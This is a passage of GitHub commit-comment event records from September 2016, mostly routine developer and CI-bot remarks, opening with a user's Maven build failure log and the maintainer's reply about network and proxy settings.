[mailto:notifications@github.com]\r\nSent: Thursday, September 8, 2016 11:12 PM\r\nTo: seand9/lvm-openstack-adapters <lvm-openstack-adapters@noreply.github.com>\r\nSubject: Re: [seand9/lvm-openstack-adapters] small fix to enable auto mount discovery (208db6c)\r\n\r\n\r\nHi Support,\r\nl get the error as below when l build the package with maven ,could you please help check the error info.Thanks in advance!\r\n\r\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\nmvn -X clean package\r\n\r\nApache Maven 3.0.5 (Red Hat 3.0.5-16)\r\nMaven home: /usr/share/maven\r\nJava version: 1.7.0_111, vendor: Oracle Corporation\r\nJava home: /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.el7_2.x86_64/jre\r\nDefault locale: en_US, platform encoding: UTF-8\r\nOS name: \"linux\", version: \"3.10.0-327.22.2.el7.x86_64\", arch: \"amd64\", family: \"unix\"\r\n[INFO] Error stacktraces are turned on.\r\n[DEBUG] Reading global settings from /usr/share/maven/conf/settings.xml\r\n[DEBUG] Reading user settings from /root/.m2/settings.xml\r\n[DEBUG] Using local repository at /root/.m2/repository\r\n[DEBUG] Using manager EnhancedLocalRepositoryManager with priority 10 for /root/.m2/repository\r\n[INFO] Scanning for projects...\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdaptersParent:pom:1.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging pom from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:VirtualizationAPIs:jar:1.0.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging jar from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdapters:war:1.0.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging war from ClassRealm[plexus.core, parent: null]\r\n[DEBUG] Extension realms for project com.sap.vcm:LVMAdaptersApp👂1.0: (none)\r\n[DEBUG] Looking up lifecyle mappings for packaging ear from ClassRealm[plexus.core, parent: null]\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Reactor Build Order:\r\n[INFO]\r\n[INFO] VirtualizationAPIs\r\n[INFO] LVMAdapters\r\n[INFO] LVMAdaptersApp\r\n[INFO] LVM Openstack Adapter Parent Project\r\n[DEBUG] === REACTOR BUILD PLAN ================================================\r\n[DEBUG] Project: com.sap.vcm:VirtualizationAPIs:jar:1.0.0\r\n[DEBUG] Tasks: [clean, package]\r\n[DEBUG] Style: Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdapters:war:1.0.0\r\n[DEBUG] Tasks: [clean, package]\r\n[DEBUG] Style: Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdaptersApp👂1.0\r\n[DEBUG] Tasks: [clean, package]\r\n[DEBUG] Style: Regular\r\n[DEBUG] -----------------------------------------------------------------------\r\n[DEBUG] Project: com.sap.vcm:LVMAdaptersParent:pom:1.0\r\n[DEBUG] Tasks: [clean, package]\r\n[DEBUG] Style: Regular\r\n[DEBUG] =======================================================================\r\n[INFO]\r\n\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Building VirtualizationAPIs 1.0.0\r\n[INFO] ------------------------------------------------------------------------\r\n[DEBUG] Lifecycle default -> [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]\r\n[DEBUG] Lifecycle clean -> [pre-clean, clean, post-clean]\r\n[DEBUG] Lifecycle site -> [pre-site, site, post-site, site-deploy]\r\n[DEBUG] Lifecycle default -> [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]\r\n[DEBUG] Lifecycle clean -> [pre-clean, clean, post-clean]\r\n[DEBUG] Lifecycle site -> [pre-site, site, post-site, site-deploy]\r\n[DEBUG] Using connector WagonRepositoryConnector with priority 0 for http://repo.maven.apache.org/maven2\r\nDownloading: http://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/2.4.1/maven-clean-plugin-2.4.1.pom\r\n[DEBUG] Writing resolution tracking file /root/.m2/repository/org/apache/maven/plugins/maven-clean-plugin/2.4.1/maven-clean-plugin-2.4.1.pom.lastUpdated\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Reactor Summary:\r\n[INFO]\r\n[INFO] VirtualizationAPIs ................................ FAILURE [22.115s]\r\n[INFO] LVMAdapters ....................................... SKIPPED\r\n[INFO] LVMAdaptersApp .................................... SKIPPED\r\n[INFO] LVM Openstack Adapter Parent Project .............. SKIPPED\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] BUILD FAILURE\r\n[INFO] ------------------------------------------------------------------------\r\n[INFO] Total time: 22.345s\r\n[INFO] Finished at: Fri Sep 09 14:08:34 CST 2016\r\n[INFO] Final Memory: 7M/178M\r\n[INFO] ------------------------------------------------------------------------\r\n[ERROR] Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host -> [Help 1]\r\norg.apache.maven.plugin.PluginResolutionException: Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1\r\nat org.apache.maven.plugin.internal.DefaultPluginDependenciesResolver.resolve(DefaultPluginDependenciesResolver.java:129)\r\nat org.apache.maven.plugin.internal.DefaultMavenPluginManager.getPluginDescriptor(DefaultMavenPluginManager.java:142)\r\nat org.apache.maven.plugin.internal.DefaultMavenPluginManager.getMojoDescriptor(DefaultMavenPluginManager.java:261)\r\nat org.apache.maven.plugin.DefaultBuildPluginManager.getMojoDescriptor(DefaultBuildPluginManager.java:185)\r\nat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.setupMojoExecution(DefaultLifecycleExecutionPlanCalculator.java:152)\r\nat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.setupMojoExecutions(DefaultLifecycleExecutionPlanCalculator.java:139)\r\nat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.calculateExecutionPlan(DefaultLifecycleExecutionPlanCalculator.java:116)\r\nat org.apache.maven.lifecycle.internal.DefaultLifecycleExecutionPlanCalculator.calculateExecutionPlan(DefaultLifecycleExecutionPlanCalculator.java:129)\r\nat org.apache.maven.lifecycle.internal.BuilderCommon.resolveBuildPlan(BuilderCommon.java:92)\r\nat org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject(LifecycleModuleBuilder.java:81)\r\nat org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject(LifecycleModuleBuilder.java:59)\r\nat org.apache.maven.lifecycle.internal.LifecycleStarter.singleThreadedBuild(LifecycleStarter.java:183)\r\nat org.apache.maven.lifecycle.internal.LifecycleStarter.execute(LifecycleStarter.java:161)\r\nat org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:320)\r\nat org.apache.maven.DefaultMaven.execute(DefaultMaven.java:156)\r\nat org.apache.maven.cli.MavenCli.execute(MavenCli.java:537)\r\nat org.apache.maven.cli.MavenCli.doMain(MavenCli.java:196)\r\nat org.apache.maven.cli.MavenCli.main(MavenCli.java:141)\r\nat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\nat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\r\nat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\nat java.lang.reflect.Method.invoke(Method.java:606)\r\nat org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced(Launcher.java:290)\r\nat org.codehaus.plexus.classworlds.launcher.Launcher.launch(Launcher.java:230)\r\nat org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode(Launcher.java:414)\r\nat org.codehaus.plexus.classworlds.launcher.Launcher.main(Launcher.java:357)\r\nCaused by: org.sonatype.aether.resolution.ArtifactDescriptorException: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1\r\nat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.loadPom(DefaultArtifactDescriptorReader.java:296)\r\nat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.readArtifactDescriptor(DefaultArtifactDescriptorReader.java:186)\r\nat org.sonatype.aether.impl.internal.DefaultRepositorySystem.readArtifactDescriptor(DefaultRepositorySystem.java:279)\r\nat org.apache.maven.plugin.internal.DefaultPluginDependenciesResolver.resolve(DefaultPluginDependenciesResolver.java:115)\r\n... 25 more\r\nCaused by: org.sonatype.aether.resolution.ArtifactResolutionException: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host\r\nat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolve(DefaultArtifactResolver.java:538)\r\nat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolveArtifacts(DefaultArtifactResolver.java:216)\r\nat org.sonatype.aether.impl.internal.DefaultArtifactResolver.resolveArtifact(DefaultArtifactResolver.java:193)\r\nat org.apache.maven.repository.internal.DefaultArtifactDescriptorReader.loadPom(DefaultArtifactDescriptorReader.java:281)\r\n... 28 more\r\nCaused by: org.sonatype.aether.transfer.ArtifactTransferException: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host\r\nat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$4.wrap(WagonRepositoryConnector.java:951)\r\nat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$4.wrap(WagonRepositoryConnector.java:939)\r\nat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$GetTask.run(WagonRepositoryConnector.java:669)\r\nat org.sonatype.aether.util.concurrency.RunnableErrorForwarder$1.run(RunnableErrorForwarder.java:60)\r\nat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)\r\nat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)\r\nat java.lang.Thread.run(Thread.java:745)\r\nCaused by: org.apache.maven.wagon.TransferFailedException: No route to host\r\nat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.fillInputData(AbstractHttpClientWagon.java:892)\r\nat org.apache.maven.wagon.StreamWagon.getInputStream(StreamWagon.java:116)\r\nat org.apache.maven.wagon.StreamWagon.getIfNewer(StreamWagon.java:88)\r\nat org.apache.maven.wagon.StreamWagon.get(StreamWagon.java:61)\r\nat org.sonatype.aether.connector.wagon.WagonRepositoryConnector$GetTask.run(WagonRepositoryConnector.java:601)\r\n... 4 more\r\nCaused by: java.net.NoRouteToHostException: No route to host\r\nat java.net.PlainSocketImpl.socketConnect(Native Method)\r\nat java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339)\r\nat java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200)\r\nat java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182)\r\nat java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)\r\nat java.net.Socket.connect(Socket.java:579)\r\nat org.apache.http.conn.scheme.PlainSocketFactory.connectSocket(PlainSocketFactory.java:127)\r\nat org.apache.http.impl.conn.DefaultClientConnectionOperator.openConnection(DefaultClientConnectionOperator.java:180)\r\nat org.apache.http.impl.conn.ManagedClientConnectionImpl.open(ManagedClientConnectionImpl.java:294)\r\nat org.apache.http.impl.client.DefaultRequestDirector.tryConnect(DefaultRequestDirector.java:643)\r\nat org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:479)\r\nat org.apache.http.impl.client.AbstractHttpClient.execute(AbstractHttpClient.java:906)\r\nat org.apache.http.impl.client.AbstractHttpClient.execute(AbstractHttpClient.java:805)\r\nat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.execute(AbstractHttpClientWagon.java:746)\r\nat org.apache.maven.wagon.shared.http4.AbstractHttpClientWagon.fillInputData(AbstractHttpClientWagon.java:886)\r\n... 8 more\r\n[ERROR]\r\n[ERROR]\r\n[ERROR] For more information about the errors and possible solutions, please read the following articles:\r\n[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginResolutionException\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/seand9/lvm-openstack-adapters/commit/208db6c1db19c792f9bdef8cf8915a701ac6ef0e#commitcomment-18958163>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ACnF6KV7bStyReaAqx_e60XgZEEUdf36ks5qoPipgaJpZM4J4u0G>.\r\n"}},"created_at":"2016-09-09T16:22:31Z"}
{"id":"4541021400","type":"CommitCommentEvent","actor":{"login":"Ullfis"},"repo":{"name":"aurelia-ui-toolkits/aurelia-materialize-bridge"},"payload":{"comment":{"id":18965563,"position":null,"line":null,"path":null,"commit_id":"277f7cfa174e74cd4f3839df7e269ba0daee5047","created_at":"2016-09-09T16:23:07Z","updated_at":"2016-09-09T16:23:07Z","body":"Diff is right :smile: It's the sidenav. 30 lines below hehe"}},"created_at":"2016-09-09T16:23:07Z"}
{"id":"4541032959","type":"CommitCommentEvent","actor":{"login":"pnolen"},"repo":{"name":"Microsoft/HoloToolkit-Unity"},"payload":{"comment":{"id":18965591,"position":null,"line":null,"path":null,"commit_id":"4d8fd9213fee9934e5b439f81c340b418ff0da72","created_at":"2016-09-09T16:25:26Z","updated_at":"2016-09-09T16:25:26Z","body":"I can try to clarify: previously the billboard for a tagalong in Free would turn so that it was facing the camera on both orientations. So, if you were looking straight down at it would face the user as it was oriented with the floor, similar to the bloom menu. It still does this but now it also rotates on the Z axis so that it's essentially rotated with the user's head rather than staying in line with the rest of the world. While this can keep the tagalong or whatever in the holographic frame, it's also a little disorienting and doesn't match the way the UI works in the shell. So another option that would allow Free rotation but with a locked Z axis would be desirable (and would match the previous functionality)."}},"created_at":"2016-09-09T16:25:26Z"}
{"id":"4541036686","type":"CommitCommentEvent","actor":{"login":"julienbourdeau"},"repo":{"name":"PrestaShop/docs"},"payload":{"comment":{"id":18965597,"position":null,"line":null,"path":null,"commit_id":"30d85d2d421b70f36e52eb6aa1938891bb5bbd5d","created_at":"2016-09-09T16:26:11Z","updated_at":"2016-09-09T16:26:11Z","body":"What do you have in mind? I'm not sure I understood."}},"created_at":"2016-09-09T16:26:11Z"}
{"id":"4541037174","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965598,"position":null,"line":null,"path":null,"commit_id":"4b79c4c224d6e3aa5b596834af3fce8d40749afc","created_at":"2016-09-09T16:26:17Z","updated_at":"2016-09-09T16:26:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ds7bDpYkTbK62e9F8W-GbA"}},"created_at":"2016-09-09T16:26:17Z"}
{"id":"4541038085","type":"CommitCommentEvent","actor":{"login":"SpainTrain"},"repo":{"name":"github/hub"},"payload":{"comment":{"id":18965600,"position":null,"line":null,"path":null,"commit_id":"97506154331e65a966c7adf2ef8d7c19ae1dcd33","created_at":"2016-09-09T16:26:26Z","updated_at":"2016-09-09T16:26:26Z","body":"so much :heart: \r\n\r\nthank you :tada: "}},"created_at":"2016-09-09T16:26:26Z"}
{"id":"4541043758","type":"CommitCommentEvent","actor":{"login":"kpodemski"},"repo":{"name":"PrestaShop/docs"},"payload":{"comment":{"id":18965619,"position":null,"line":null,"path":null,"commit_id":"30d85d2d421b70f36e52eb6aa1938891bb5bbd5d","created_at":"2016-09-09T16:27:38Z","updated_at":"2016-09-09T16:27:38Z","body":"We've talked about this on Gitter, we have `Theme Options` module where people can change settings of the theme, those settings must be available on front-end, we've talked about the possibility to have a hook on `FrontController::init` or some other way to achieve this."}},"created_at":"2016-09-09T16:27:38Z"}
{"id":"4541046653","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":18965630,"position":1,"line":1,"path":"net/FlatBuffers/IFlatbufferObject .cs","commit_id":"8e3fa336eb894317cd828163d1677265da3a3483","created_at":"2016-09-09T16:28:14Z","updated_at":"2016-09-09T16:28:14Z","body":"No, not intended. Not sure how that got in there, will fix. Thanks for noticing."}},"created_at":"2016-09-09T16:28:14Z"}
{"id":"4541052568","type":"CommitCommentEvent","actor":{"login":"shinzangetsu"},"repo":{"name":"PLMCSIT/LexiCom"},"payload":{"comment":{"id":18965645,"position":null,"line":null,"path":null,"commit_id":"74da9c91de750f3d84aaa52aed97b42b483e4954","created_at":"2016-09-09T16:29:27Z","updated_at":"2016-09-09T16:29:27Z","body":"jolens mali. may flow na para sa \" at ' nasa next page."}},"created_at":"2016-09-09T16:29:27Z"}
{"id":"4541054631","type":"CommitCommentEvent","actor":{"login":"andyormsby"},"repo":{"name":"salesforceidentity/IdentityTrail-Module3"},"payload":{"comment":{"id":18965649,"position":null,"line":null,"path":null,"commit_id":"c803c66b282281e36236e657cb9d9d783485e988","created_at":"2016-09-09T16:29:52Z","updated_at":"2016-09-09T16:29:52Z","body":"There's still a potential issue in the code for createUser() as Userinfo.getLocale() can return values which are not valid as languagelocalekey values on the User.\r\nFor example, on my org, Userinfo.getLocale() returns en_IE_EURO which causes user creation to barf."}},"created_at":"2016-09-09T16:29:52Z"}
{"id":"4541058958","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":18965661,"position":null,"line":null,"path":null,"commit_id":"9ad062499da2e91dfc7b8d05855ea099bbacdf7e","created_at":"2016-09-09T16:30:45Z","updated_at":"2016-09-09T16:30:45Z","body":"Hey cala...one more thing ;) What were the proofs and sources for this commit with the black rumsey rum? "}},"created_at":"2016-09-09T16:30:45Z"}
{"id":"4541059336","type":"CommitCommentEvent","actor":{"login":"MotosierraLab"},"repo":{"name":"cesargafer/Even-Fibonacci-numbers"},"payload":{"comment":{"id":18965662,"position":null,"line":null,"path":null,"commit_id":"6492d9857a582e8d49e3168d604618714106524d","created_at":"2016-09-09T16:30:50Z","updated_at":"2016-09-09T16:30:50Z","body":"OK, no biggie :fire:"}},"created_at":"2016-09-09T16:30:50Z"}
{"id":"4541059790","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18965664,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-09T16:30:56Z","updated_at":"2016-09-09T16:30:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 980](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13102&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:08:45"}},"created_at":"2016-09-09T16:30:56Z"}
{"id":"4541072273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18965695,"position":null,"line":null,"path":null,"commit_id":"a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0","created_at":"2016-09-09T16:33:32Z","updated_at":"2016-09-09T16:33:32Z","body":"test_build_branch (lefticus) - x86_64-MacOS-10.9-clang: Tests Failed (1532 of 2042 tests passed, 36 test warnings)\n\n * 536 tests had: AUD diffs.\n * 527 tests had: EIO diffs.\n * 420 tests had: ESO small diffs.\n * 509 tests had: RDD diffs.\n * 495 tests had: Table big diffs.\n * 358 tests had: MTR small diffs.\n * 115 tests had: ESO big diffs.\n * 420 tests had: BND diffs.\n * 86 tests had: ERR diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 28 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a4ee26c12b13217ebd7fd6ee1bfa66b66e7b29b0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.02%25-red.svg)</a> \n"}},"created_at":"2016-09-09T16:33:32Z"}
{"id":"4541072587","type":"CommitCommentEvent","actor":{"login":"caesarsol"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":18965698,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-09T16:33:36Z","updated_at":"2016-09-09T16:33:36Z","body":"@mbostock thanks, I missed that issue, I were searching for an open one! \r\nLesson learned."}},"created_at":"2016-09-09T16:33:36Z"}
{"id":"4541074764","type":"CommitCommentEvent","actor":{"login":"seand9"},"repo":{"name":"seand9/lvm-openstack-adapters"},"payload":{"comment":{"id":18965704,"position":null,"line":null,"path":null,"commit_id":"208db6c1db19c792f9bdef8cf8915a701ac6ef0e","created_at":"2016-09-09T16:34:05Z","updated_at":"2016-09-09T16:34:05Z","body":"Looks like you have no route to host for your maven repository; if you’re behind a firewall make sure you have maven proxy settings configured.\r\n\r\nERROR] Plugin org.apache.maven.plugins:maven-clean-plugin:2.4.1 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-clean-plugin:jar:2.4.1: Could not transfer artifact org.apache.maven.plugins:maven-clean-plugin:pom:2.4.1 from/to central (http://repo.maven.apache.org/maven2): No route to host -> [Help 1]\r\n\r\nAlso as stated in the notes this is only tested with java 6; looks like you have java 7.\r\n"}},"created_at":"2016-09-09T16:34:05Z"}
{"id":"4541075426","type":"CommitCommentEvent","actor":{"login":"jaraco"},"repo":{"name":"jaraco/pbr"},"payload":{"comment":{"id":18965706,"position":null,"line":null,"path":null,"commit_id":"25252461376bc37ae1826404cd6a1729ebc1f9d3","created_at":"2016-09-09T16:34:13Z","updated_at":"2016-09-09T16:34:13Z","body":"I'll bet this technique doesn't work on Python 2 if Distribution is an old-style class."}},"created_at":"2016-09-09T16:34:13Z"}
{"id":"4541076741","type":"CommitCommentEvent","actor":{"login":"dirkonet"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18965708,"position":28,"line":19,"path":"texte/vorwort.tex","commit_id":"2bb4c34414448058942200b35358ca93437bea66","created_at":"2016-09-09T16:34:31Z","updated_at":"2016-09-09T16:34:31Z","body":"Laut [Liste des Studentenwerks](http://www.studentenwerk-dresden.de/kultur/studentenclubs.html) sind wir wohl inzwischen auf 12 Clubs mit physischer Adresse in Dresden bzw. 13, wenn man exma mitzählt, runter 😞 "}},"created_at":"2016-09-09T16:34:31Z"}
{"id":"4541079527","type":"CommitCommentEvent","actor":{"login":"7172"},"repo":{"name":"mikepenz/AboutLibraries"},"payload":{"comment":{"id":18965719,"position":null,"line":null,"path":null,"commit_id":"8363e62f56ec9a4a868eeb5c9c98a2518b1a8795","created_at":"2016-09-09T16:35:07Z","updated_at":"2016-09-09T16:35:07Z","body":"Hi can you help me to make it understad about git hub"}},"created_at":"2016-09-09T16:35:07Z"}
{"id":"4541083258","type":"CommitCommentEvent","actor":{"login":"william-gr"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":18965730,"position":4,"line":40,"path":"src/freenas/usr/local/libexec/freenas-debug/ipmi/ipmi.sh","commit_id":"e05f90f1d5f34874981ce43fc5e53cfa133235bc","created_at":"2016-09-09T16:35:52Z","updated_at":"2016-09-09T16:35:52Z","body":"-I open was removed, but its still in the section_header"}},"created_at":"2016-09-09T16:35:52Z"}
{"id":"4541094655","type":"CommitCommentEvent","actor":{"login":"aycabta"},"repo":{"name":"aycabta/rubygems.org"},"payload":{"comment":{"id":18965756,"position":7,"line":121,"path":"config/locales/en.yml","commit_id":"08738e1ed636ce086da923dcccda72740927d67d","created_at":"2016-09-09T16:38:16Z","updated_at":"2016-09-09T16:38:16Z","body":"I make sure your representation and my miscue by actual application behavior at local. Thank you. I pushed [new commit](https://github.com/aycabta/rubygems.org/commit/fafb665cad2bb5b6682afee1b3441f130f943100)."}},"created_at":"2016-09-09T16:38:16Z"}
{"id":"4541101429","type":"CommitCommentEvent","actor":{"login":"gregvenech"},"repo":{"name":"webpack/webpack.js.org"},"payload":{"comment":{"id":18965768,"position":null,"line":null,"path":null,"commit_id":"dd668f5140b11d49d75d7975fa1c7901d0c41c44","created_at":"2016-09-09T16:39:35Z","updated_at":"2016-09-09T16:39:35Z","body":"All good... I've been meaning to create an issue for this as it's like the fourth time I've caught these errors. I updated the markdown file to warn more descriptively but it only shows errors when starting the dev-server or running a build but not on recompilation. \r\n\r\nWould be great if we could catch it in markdownlint and maybe we should add a list of prism's supported languages to the writers' guide."}},"created_at":"2016-09-09T16:39:35Z"}
{"id":"4541101573","type":"CommitCommentEvent","actor":{"login":"CytokineStormdLife"},"repo":{"name":"AriellaF/GitTest"},"payload":{"comment":{"id":18965769,"position":11,"line":9,"path":"src/Tester.java","commit_id":"fc51743c552412518a5f473c9795ce9430cc7214","created_at":"2016-09-09T16:39:37Z","updated_at":"2016-09-09T16:39:37Z","body":"Testing"}},"created_at":"2016-09-09T16:39:37Z"}
{"id":"4541102388","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18965774,"position":null,"line":null,"path":null,"commit_id":"8c0544c264c72622548ef2027a876292279363dc","created_at":"2016-09-09T16:39:47Z","updated_at":"2016-09-09T16:39:47Z","body":"I already added PKGBUILD to sh a while ago :)\r\n\r\nhttps://github.com/zyedidia/micro/pull/123"}},"created_at":"2016-09-09T16:39:47Z"}
{"id":"4541103658","type":"CommitCommentEvent","actor":{"login":"heytitle"},"repo":{"name":"youpin-city/youpin-bot"},"payload":{"comment":{"id":18965778,"position":14,"line":14,"path":"Dockerfile","commit_id":"1943f3ec2063893f9e3a165f640ad9ea6a9d5d5e","created_at":"2016-09-09T16:40:03Z","updated_at":"2016-09-09T16:40:03Z","body":"Should we remove this line out from Dockerfile? I think It should be configurable based on environment."}},"created_at":"2016-09-09T16:40:03Z"}
{"id":"4541104881","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965782,"position":null,"line":null,"path":null,"commit_id":"c72e215ed7a1d612eac5c2a36b3c4d35d22d37fe","created_at":"2016-09-09T16:40:18Z","updated_at":"2016-09-09T16:40:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dR1IZmUoTW2Ur8o-QylK5A"}},"created_at":"2016-09-09T16:40:18Z"}
{"id":"4541105622","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965783,"position":null,"line":null,"path":null,"commit_id":"c72e215ed7a1d612eac5c2a36b3c4d35d22d37fe","created_at":"2016-09-09T16:40:25Z","updated_at":"2016-09-09T16:40:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cuYn9mRJRhOJZDlISVp9bA"}},"created_at":"2016-09-09T16:40:25Z"}
{"id":"4541106482","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18965786,"position":null,"line":null,"path":null,"commit_id":"c72e215ed7a1d612eac5c2a36b3c4d35d22d37fe","created_at":"2016-09-09T16:40:33Z","updated_at":"2016-09-09T16:40:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GNJ30UfySXql7nQjQxgOgg"}},"created_at":"2016-09-09T16:40:33Z"}
{"id":"4541109152","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18965791,"position":null,"line":null,"path":null,"commit_id":"9c1cfc855318d12f7c0a1c4fbe8f35564aa72769","created_at":"2016-09-09T16:41:03Z","updated_at":"2016-09-09T16:41:03Z","body":"Thanks for pointing that out!\r\nI have made a commit which should ideally fix this : https://github.com/phpmyadmin/phpmyadmin/commit/f797a8d87d8bf3cab3380747194ddd3c5db195e1 "}},"created_at":"2016-09-09T16:41:03Z"}
{"id":"4541110808","type":"CommitCommentEvent","actor":{"login":"zyedidia"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18965795,"position":null,"line":null,"path":null,"commit_id":"8c0544c264c72622548ef2027a876292279363dc","created_at":"2016-09-09T16:41:24Z","updated_at":"2016-09-09T16:41:24Z","body":"Ah right... I missed that."}},"created_at":"2016-09-09T16:41:24Z"}
